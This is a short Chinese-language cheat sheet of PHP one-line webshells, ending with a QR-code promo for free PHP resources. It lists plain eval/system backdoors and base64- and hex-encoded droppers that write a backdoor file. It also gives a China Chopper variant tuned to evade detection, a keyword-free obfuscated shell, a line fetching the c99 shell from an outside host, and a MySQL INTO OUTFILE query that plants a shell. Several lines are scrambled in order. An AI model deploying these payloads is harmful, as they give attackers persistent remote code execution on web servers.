一、基础类的一句话--功能仅限于验证漏洞了,实际中非常容易被查出出来:
eval($_GET["code"]) @
"cmd"]) @system($_POST[
二、编码的替换的类型:
'bG9zdC5waHA='),w),base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWydsb3N0d29sZiddKTs/Pg==')); @fputs(fopen(base64_decode(
//会生成eval($_POST['lostwolf']); @
<script language="php">@fputs(fopen(base64_decode('bG9zdC5waHA='),w),base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWydsb3N0d29sZiddKTs/Pg=='));</script>
//php在html内部的一种嵌入方式
"H*","6c6f7374776f6c662e706870"),"w"),pack("H*","3c3f406576616c28245f504f53545b6c6f7374776f6c665d293f3e")) fputs (fopen(pack(
session_start();
$_POST['code'] && $_SESSION['theCode'] = trim($_POST['code']);
$_SESSION['theCode']&&preg_replace('\'a\'eis','e'.'v'.'a'.'l'.'(base64_decode($_SESSION[\'theCode\']))','a');
三、其他类型:
$_GET[a]($_GET[b]);
//?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};
"pass"]); //菜刀连接 躲避检测 密码pass assert($_REQUEST[
'x']),28)=='acd0'&&eval($_REQUEST['pass']);?> substr(md5($_REQUEST[
//菜刀提交 http://192.168.1.5/x.php?x=lostwolf 脚本类型:php 密码为 pass
四、下载类型:
echo copy("http://www.r57.me/c99.txt","lostwolf.php");
echo file_get_contents("..//cfg_database.php"); //显示某文件
eval ( file_get_contents("远程shell")) //运行远程shell
五、无关键函数类型:
$_="";
$_[+""]='';
$_="$_"."";
$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");
'_'.$_}['_'](${'_'.$_}['__']); ${
http://site/2.php?_=assert&__=eval($_POST['pass']) 密码是pass
"";$_[+""]='_';$_="$_"."";$_=($_[+""]|"").($_[+""]|"").($_[+""]^""); $_=
六、补充知识点:
SQL写一句话(MySQL):
select "<?php @system($_POST["pass"]);?>" into outfile "/home/webaccount/projectname/www/*.php"
#前面是一句话内容 后面是绝对路径www下的PHP文件,同理其他脚本也可以
完
它,
不仅仅是一个码
扫码关注
PHP资源免费送